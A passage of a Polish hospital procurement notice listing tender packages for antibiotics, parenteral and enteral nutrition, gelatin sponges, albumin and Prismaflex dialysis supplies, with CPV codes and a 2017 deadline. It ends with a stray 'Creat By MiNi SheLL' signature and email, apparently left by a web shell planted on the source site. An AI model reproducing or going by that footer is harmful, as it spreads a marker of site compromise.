27.	Clarithromycin	 susp. 125mg/5ml 100ml x 1	op.	2
28.	Clarithromycin	 susp. 250mg/5ml 100ml x 1	op.	3
29.	Clindamycin 	caps.0,15g x 16	op.	1
30.	Colistin	fiol. 1Mj.m. x 20	op.	39
31.	Erythromycin 	 tabl 0.2 g  x 16	op.	1
32.	Gentamicin	 amp 0.08/2ml  x 10   dożylna 	op.	30
33.	Spiramycin	tabl.  3 mln x 10	op.	7
34.	Azithromycin	 pr.d/sporz.zaw. 200mg/5ml 20ml	op.	1
35.	Azithromycin	 pr.d/sporz.zaw. 200mg/5ml 30ml	op.	13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.01.2017.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Preparaty do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienie 	Dawka / opakowanie	Jednostka miary	Ilość jednostek miary zamawiana 
(wg. wielkości dawki/opakowania określonego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Worek dwukomorowy do żywienia pozajelitowego drogą żył centralnych zawierający roztwór aminokwasów z elektrolitami oraz roztwór glukozy z wapniem, zawartość azotu 12,4 g, osmolarność 1625 mOsm/l, całk. wartość energ. 1350 kcal	N17G35E, płyn infuz. 1500 ml	szt.	24
2.	Roztwór L-aminokwasów (125g/l) z elektrolitami do żywienia pozajelitowego, osmolarność 1430 mOsm/l, zawartość azotu 19,5g/l, całk. wartość energ. 500 kcal/l	płyn infuz. 500 ml	szt.	80
3.	Roztwór L-aminokwasów do żywienia pozajelitowego u pacjentów z ostrą lub przewlekłą niewydolnością nerek poddawnaych hemiodializie lub hemofiltracji, osmolarność 510 mOsm/l, zawartość azotu 8,6 g/l, całk. wartość energ. 222 kcal/l	płyn infuz. 500 ml	szt.	70
4.	Worek trzykomorowy do żywienia pozajelitowego drogą żył centralnych zawierający roztwór aminokwasów, emulsję tłuszczową (80% oleju z oliwek i 20% oleju sojowego), węglowodany. Zawartość azotu 13,5 g, energia niebiałkowa 1260 kcal , osmolarność 1170 mOsm/l 	 N9, płyn inf.1500 ml	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.01.2017.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Preparaty i sprzęt do leczenia żywieniowego drogą przewodu pokarmowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienie 	Dawka / opakowanie	Jednostka miary	Ilość jednostek miary zamawiana 
(wg. wielkości dawki/opakowania określonego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Dieta bogatoresztkowa, kompletna, normokaloryczna ( 1 kcal/ml), do leczenia żywieniowego drogą przewodu pokarmowego	butelka 500 ml	op	120
2.	Dieta zawierająca białko i argininę kompletna pod względem odżywczym gotowa do użycia zawierająca błonnik przeznaczona do stosowania przez zgłębnik	worek 1000ml	op	16
3.	Dieta peptydowa kompletna pod względem odżywczym gotowa do użycia, niskotłuszczowa, bezresztkowa, przeznaczona do stosowania przez zgłębnik	butelka 500 ml	op	60
4.	Przyrząd grawitacyjny zest. do żywienia dojelitowego służący do połączenia worka z  dietą - ze zgłębnikiem	x	op	8
5.	Przyrząd grawitacyjny zest. do żywienia dojelitowego służący do połączenia opakowania diety - butelek 500 ml - ze zgłębnikiem	x	op	24
6.	Zgłębnik przeznaczony do żywienia dożołądkowego lub dojelitowego	CH10 x 110	op	1
7.	Zgłębnik przeznaczony do żywienia dożołądkowego lub dojelitowego	CH12 x 110	op	1
8.	Zgłębnik przeznaczony do żywienia bezpośrednio do jelita lub dwunastnicy /nosowo-jelitowy/	CH10 x 145 cm	op	1
9.	Dieta cząstkowa, wysokobiałkowa w proszku	puszka 400 g	op	8
10.	Uniwerslany zestaw do pompy Flocare Infinity	x	op	80
11.	Dieta kompletna pod względem odżywczym, gotowa do użycia, wysokobiałkowa, o wartości energetycznej 1,5kcal/ml, niskim indeksie glikemicznym, wzbogacona o błonnik, przeznaczona do stosowania przez zgłębnik	worek 1000ml	op	44
12.	Dieta kompletna pod względem odżywczym z dodatkiem błonnika, gotowa do użycia, przeznaczona do stosowania przez zgłębnik u pacjentów, kaloryczność 1,28 kcal / ml	worek 500 ml	op	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.01.2017.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5  - Gąbki żelatynowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienie 	Dawka / opakowanie	Jednostka miary	Ilość jednostek miary zamawiana 
(wg. wielkości dawki/opakowania określonego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Sterylna , absorbująca i nierozpuszczalna w wodzie gąbka żelatynowa o działaniu hemostatycznym 8,5 x 4 x 1 lub 7 x 5 x 1 x 1 szt	8 x 5 x 1cm	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.01.2017.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Albuminy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienie 	Dawka / opakowanie	Jednostka miary	Ilość jednostek miary zamawiana 
(wg. wielkości dawki/opakowania określonego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Albumina  ludzka 	20%/100 ml x 1 flakon	flakon	150
2.	Albumina  ludzka 	20%/50ml x 1 flakon	flakon	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.01.2017.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Zestaw do dializ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienie 	Dawka / opakowanie	Jednostka miary	Ilość jednostek miary zamawiana 
(wg. wielkości dawki/opakowania określonego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Cewnik dializacyjny dwuświatłowy (O 13mm dł 20 cm)	śr. 13 mm dł 20 cm	szt.	8
2.	Płyn substytucyjny z zawartością cytrynianu, nie wymagający stosowania antykoagulacji systemowej. Połączenie zestawu z workiem przez port z dużą gumową membraną przekłuwaną plastikową igłą bez konieczności przełamywania zawleczki. Kompatybilny z zestawem CRRT do aparatu Prismaflex	worek 5 l o zawartości cytrynianów 18 mmol/l 	szt.= worek	220
3.	Płyn dializacyjny bezwapniowy . Połączenie zestawu do zabiegów z workiem przez port z dużą gumową membraną przekłuwaną plastikową igłą bez konieczności przełamywania zawleczki. Kompatybilny z zestawem CRRT do aparatu Prismaflex. 	zawartość HCO3 = 22 mmol/l , worek dwukomorowy 5 l	szt.	210
4.	Płyn substytucyjny do terapii cytrynianowej. Połączenie zestawu do zabiegów z workiem przez port z dużą gumową membraną przekłuwaną plastikową igłą, bez konieczności przełamywania zawleczki . Kompatybilny z zestawem CRRT do aparatu Prismaflex	zawartość wodorofosforanów 1,2 mmol/l , worek dwukomorowy 5l	szt.	100
5.	Linia do podaży wapnia		szt.	25
6.	Zestaw do hemofiltracji kompatybilny z aparatem Prismaflex wraz z workiem z dolnym odpływem na ultrafiltrat	1,5 m 2 pow. hemofiltra	szt.	16.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.01.2017.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com